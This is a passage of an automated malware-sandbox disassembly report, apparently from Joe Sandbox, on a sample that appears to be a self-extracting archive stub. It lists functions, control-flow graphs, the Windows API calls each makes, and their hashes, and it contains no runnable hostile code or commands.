                                                                                    control_flow_graph 838 73d78f-73d7a7 call 73ec50 841 73d9e8-73d9f0 838->841 842 73d7ad-73d7b9 call 743e13 838->842 842->841 845 73d7bf-73d7e7 call 73fff0 842->845 848 73d7f1-73d7ff 845->848 849 73d7e9 845->849 850 73d812-73d818 848->850 851 73d801-73d804 848->851 849->848 853 73d85b-73d85e 850->853 852 73d808-73d80e 851->852 854 73d810 852->854 855 73d837-73d844 852->855 853->852 856 73d860-73d866 853->856 857 73d822-73d82c 854->857 858 73d9c0-73d9c2 855->858 859 73d84a-73d84e 855->859 860 73d868-73d86b 856->860 861 73d86d-73d86f 856->861 864 73d81a-73d820 857->864 865 73d82e 857->865 866 73d9c6 858->866 859->866 867 73d854-73d859 859->867 860->861 862 73d882-73d898 call 72b92d 860->862 861->862 863 73d871-73d878 861->863 874 73d8b1-73d8bc call 72a231 862->874 875 73d89a-73d8a7 call 731fbb 862->875 863->862 868 73d87a 863->868 864->857 870 73d830-73d833 864->870 865->855 872 73d9cf 866->872 867->853 868->862 870->855 873 73d9d6-73d9d8 872->873 876 73d9e7 873->876 877 73d9da-73d9dc 873->877 884 73d8d9-73d8dd 874->884 885 73d8be-73d8d5 call 72b6c4 874->885 875->874 883 73d8a9 875->883 876->841 877->876 880 73d9de-73d9e1 ShowWindow 877->880 880->876 883->874 887 73d8e4-73d8e6 884->887 885->884 887->876 889 73d8ec-73d8f9 887->889 890 73d8fb-73d902 889->890 891 73d90c-73d90e 889->891 890->891 892 73d904-73d90a 890->892 893 73d910-73d919 891->893 894 73d925-73d944 call 73dc3b 891->894 892->891 895 73d97b-73d987 CloseHandle 892->895 893->894 902 73d91b-73d923 ShowWindow 893->902 894->895 908 73d946-73d94e 894->908 896 73d989-73d996 call 731fbb 895->896 897 73d998-73d9a6 895->897 896->872 896->897 897->873 901 73d9a8-73d9aa 897->901 901->873 905 73d9ac-73d9b2 901->905 902->894 905->873 907 73d9b4-73d9be 905->907 907->873 908->895 909 73d950-73d961 GetExitCodeProcess 908->909 909->895 910 73d963-73d96d 909->910 911 73d974 910->911 912 73d96f 910->912 911->895 912->911
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0073D7AE
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0073D8DE
                                                                                    • ShowWindow.USER32(?,00000000), ref: 0073D91D
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0073D959
                                                                                    • CloseHandle.KERNEL32(?), ref: 0073D97F
                                                                                    • ShowWindow.USER32(?,00000001), ref: 0073D9E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                    • String ID: .exe$.inf$PDu<s$hs$rs
                                                                                    • API String ID: 36480843-1355383514
                                                                                    • Opcode ID: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                    • Instruction ID: 02014bd91de949bd77be2867eede28e845855f5427e9e2b43baca96f0aae550a
                                                                                    • Opcode Fuzzy Hash: bb867f87618d10da924d9f522700f7e6057d0d07c7a0cd566c6162c6b0560b70
                                                                                    • Instruction Fuzzy Hash: CE5115704083849AFB319B24F8447AB7BE4EF41744F04481EF9C5971A2E7BDAE84CB52
                                                                                    Function 0074A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 913 74a95b-74a974 914 74a976-74a986 call 74ef4c 913->914 915 74a98a-74a98f 913->915 914->915 922 74a988 914->922 917 74a991-74a999 915->917 918 74a99c-74a9c0 MultiByteToWideChar 915->918 917->918 920 74a9c6-74a9d2 918->920 921 74ab53-74ab66 call 73fbbc 918->921 923 74a9d4-74a9e5 920->923 924 74aa26 920->924 922->915 928 74aa04-74aa15 call 748e06 923->928 929 74a9e7-74a9f6 call 752010 923->929 927 74aa28-74aa2a 924->927 931 74aa30-74aa43 MultiByteToWideChar 927->931 932 74ab48 927->932 928->932 939 74aa1b 928->939 929->932 938 74a9fc-74aa02 929->938 931->932 936 74aa49-74aa5b call 74af6c 931->936 937 74ab4a-74ab51 call 74abc3 932->937 943 74aa60-74aa64 936->943 937->921 942 74aa21-74aa24 938->942 939->942 942->927 943->932 945 74aa6a-74aa71 943->945 946 74aa73-74aa78 945->946 947 74aaab-74aab7 945->947 946->937 950 74aa7e-74aa80 946->950 948 74ab03 947->948 949 74aab9-74aaca 947->949 951 74ab05-74ab07 948->951 953 74aae5-74aaf6 call 748e06 949->953 954 74aacc-74aadb call 752010 949->954 950->932 952 74aa86-74aaa0 call 74af6c 950->952 955 74ab41-74ab47 call 74abc3 951->955 956 74ab09-74ab22 call 74af6c 951->956 952->937 966 74aaa6 952->966 953->955 969 74aaf8 953->969 954->955 968 74aadd-74aae3 954->968 955->932 956->955 970 74ab24-74ab2b 956->970 966->932 971 74aafe-74ab01 968->971 969->971 972 74ab67-74ab6d 970->972 973 74ab2d-74ab2e 970->973 971->951 974 74ab2f-74ab3f WideCharToMultiByte 972->974 973->974 974->955 975 74ab6f-74ab76 call 74abc3 974->975 975->937
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00745695,00745695,?,?,?,0074ABAC,00000001,00000001,2DE85006), ref: 0074A9B5
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0074ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0074AA3B
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0074AB35
                                                                                    • __freea.LIBCMT ref: 0074AB42
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    • __freea.LIBCMT ref: 0074AB4B
                                                                                    • __freea.LIBCMT ref: 0074AB70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
                                                                                    • Instruction ID: 7f37725bf5e6a976cc39e8797b82f27c825e60fc7df7d1e590850cfb0bd01f99
                                                                                    • Opcode Fuzzy Hash: 90c2ef7a549da190291c14d897a911173e75d935376eb08ab4688ea23e679bfa
                                                                                    • Instruction Fuzzy Hash: 6251C2B2A90216BFDB258F64CC45EBFB7AAEB44750F158629FC04E6150EB7CDC40C692
                                                                                    Function 00743B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 978 743b72-743b7c 979 743bee-743bf1 978->979 980 743bf3 979->980 981 743b7e-743b8c 979->981 982 743bf5-743bf9 980->982 983 743b95-743bb1 LoadLibraryExW 981->983 984 743b8e-743b91 981->984 987 743bb3-743bbc GetLastError 983->987 988 743bfa-743c00 983->988 985 743b93 984->985 986 743c09-743c0b 984->986 990 743beb 985->990 986->982 991 743be6-743be9 987->991 992 743bbe-743bd3 call 746088 987->992 988->986 989 743c02-743c03 FreeLibrary 988->989 989->986 990->979 991->990 992->991 995 743bd5-743be4 LoadLibraryExW 992->995 995->988 995->991
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00743C35,?,?,00782088,00000000,?,00743D60,00000004,InitializeCriticalSectionEx,00756394,InitializeCriticalSectionEx,00000000), ref: 00743C03
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3664257935-2084034818
                                                                                    • Opcode ID: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
                                                                                    • Instruction ID: 66293837ffbdd4c5feff7a2beaadf5f5e1e23625a8acd709d41ff33465036034
                                                                                    • Opcode Fuzzy Hash: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
                                                                                    • Instruction Fuzzy Hash: 0C110A71A44724ABDB228B589C41B997764EF017B1F214210E919FB1D0E778EF00C6D5
                                                                                    Function 0073AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                      • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    • OleInitialize.OLE32(00000000), ref: 0073AC2F
                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
                                                                                    • SHGetMalloc.SHELL32(00768438), ref: 0073AC70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                    • String ID: riched20.dll$3Ro
                                                                                    • API String ID: 3498096277-3613677438
                                                                                    • Opcode ID: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
                                                                                    • Instruction ID: e4302c4fcd413434adc3b52dea4dfb802fc5bf0eb7adf3e60b0f7d47a2ea3927
                                                                                    • Opcode Fuzzy Hash: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
                                                                                    • Instruction Fuzzy Hash: 9EF06DB1D40249ABCB10AFA9D8499EFFFFCEF84B00F10411AE801E2241CBB856058FA1
                                                                                    Function 007298E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1000 7298e0-729901 call 73ec50 1003 729903-729906 1000->1003 1004 72990c 1000->1004 1003->1004 1005 729908-72990a 1003->1005 1006 72990e-72991f 1004->1006 1005->1006 1007 729921 1006->1007 1008 729927-729931 1006->1008 1007->1008 1009 729933 1008->1009 1010 729936-729943 call 726edb 1008->1010 1009->1010 1013 729945 1010->1013 1014 72994b-72996a CreateFileW 1010->1014 1013->1014 1015 7299bb-7299bf 1014->1015 1016 72996c-72998e GetLastError call 72bb03 1014->1016 1018 7299c3-7299c6 1015->1018 1020 7299c8-7299cd 1016->1020 1022 729990-7299b3 CreateFileW GetLastError 1016->1022 1018->1020 1021 7299d9-7299de 1018->1021 1020->1021 1023 7299cf 1020->1023 1024 7299e0-7299e3 1021->1024 1025 7299ff-729a10 1021->1025 1022->1018 1026 7299b5-7299b9 1022->1026 1023->1021 1024->1025 1027 7299e5-7299f9 SetFileTime 1024->1027 1028 729a12-729a2a call 730602 1025->1028 1029 729a2e-729a39 1025->1029 1026->1018 1027->1025 1028->1029
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00727760,?,00000005,?,00000011), ref: 0072995F
                                                                                    • GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0072996C
                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00727760,?,00000005,?), ref: 007299A2
                                                                                    • GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299AA
                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                    • String ID:
                                                                                    • API String ID: 1999340476-0
                                                                                    • Opcode ID: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
                                                                                    • Instruction ID: 1b6f19a3c46cc2595d0c2fb992b1259eaab68bdd6ee7cbe26e97a77fe32fab3f
                                                                                    • Opcode Fuzzy Hash: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
                                                                                    • Instruction Fuzzy Hash: 66314730544351AFE7309F20DC4ABDABB94BB84330F180B1DF6E5961D1D3B8A994CB95
                                                                                    Function 0073B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1059 73b568-73b581 PeekMessageW 1060 73b583-73b597 GetMessageW 1059->1060 1061 73b5bc-73b5be 1059->1061 1062 73b599-73b5a6 IsDialogMessageW 1060->1062 1063 73b5a8-73b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                    • IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                    • TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                    • DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    • Opcode ID: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
                                                                                    • Instruction ID: 34fbeba6c67362867dedf975606f2b57194c11b039f836d05e6573a69e36e2ab
                                                                                    • Opcode Fuzzy Hash: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
                                                                                    • Instruction Fuzzy Hash: 0CF0BD71A4121AABDB209BE5DC4CDDB7FACEE056917008515B905D2011EB7CD605CBB5
                                                                                    Function 0073ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1064 73abab-73abca GetClassNameW 1065 73abf2-73abf4 1064->1065 1066 73abcc-73abe1 call 731fbb 1064->1066 1068 73abf6-73abf9 SHAutoComplete 1065->1068 1069 73abff-73ac01 1065->1069 1071 73abe3-73abef FindWindowExW 1066->1071 1072 73abf1 1066->1072 1068->1069 1071->1072 1072->1065
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0073ABC2
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0073ABF9
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0073ABE9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                    • String ID: EDIT
                                                                                    • API String ID: 4243998846-3080729518
                                                                                    • Opcode ID: cc278af96af5392b9bc9bdc978ef67575986a805f30a9f5b85dd34b6a37b3dde
                                                                                    • Instruction ID: 9e707f7cff5f428269232dc02ef85828e818e1deb724869cc846f144d02d6223
                                                                                    • Opcode Fuzzy Hash: cc278af96af5392b9bc9bdc978ef67575986a805f30a9f5b85dd34b6a37b3dde
                                                                                    • Instruction Fuzzy Hash: E1F0277270122977EB2097289C0AFDBB36C9F46F00F488021BE40F30C0D768DE4186BA
                                                                                    Function 0073DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1073 73dbde-73dc09 call 73ec50 SetEnvironmentVariableW call 730371 1077 73dc0e-73dc12 1073->1077 1078 73dc36-73dc38 1077->1078 1079 73dc14-73dc18 1077->1079 1080 73dc21-73dc28 call 73048d 1079->1080 1083 73dc1a-73dc20 1080->1083 1084 73dc2a-73dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: 6131ba271bb590e4d8dfb959556ddbe174bedf604b2fb95b60ebeb3fb1991fd4
                                                                                    • Instruction ID: b726a5121e318d18a7d4fbc02c77a2f00548c85d8a72c286d05db2476097d8c9
                                                                                    • Opcode Fuzzy Hash: 6131ba271bb590e4d8dfb959556ddbe174bedf604b2fb95b60ebeb3fb1991fd4
                                                                                    • Instruction Fuzzy Hash: FBF0A7B2414628AAEB201BA59C0ABFA3B58AF05B82F040415BD8595052E7FC8D40D6B0
                                                                                    Function 00729785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1085 729785-729791 1086 729793-72979b GetStdHandle 1085->1086 1087 72979e-7297b5 ReadFile 1085->1087 1086->1087 1088 729811 1087->1088 1089 7297b7-7297c0 call 7298bc 1087->1089 1090 729814-729817 1088->1090 1093 7297c2-7297ca 1089->1093 1094 7297d9-7297dd 1089->1094 1093->1094 1095 7297cc 1093->1095 1096 7297ee-7297f2 1094->1096 1097 7297df-7297e8 GetLastError 1094->1097 1098 7297cd-7297d7 call 729785 1095->1098 1100 7297f4-7297fc 1096->1100 1101 72980c-72980f 1096->1101 1097->1096 1099 7297ea-7297ec 1097->1099 1098->1090 1099->1090 1100->1101 1103 7297fe-729807 GetLastError 1100->1103 1101->1090 1103->1101 1105 729809-72980a 1103->1105 1105->1098
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00729795
                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007297AD
                                                                                    • GetLastError.KERNEL32 ref: 007297DF
                                                                                    • GetLastError.KERNEL32 ref: 007297FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    • Opcode ID: ba7c3ce583243b6c21b3dea586276b9e7654e419200a6de5068a19ef981c24d7
                                                                                    • Instruction ID: 3a29b4a343e19ecfef2b72bef6ad6c8147ebf741f3b8c9e2e045e91557f53e9f
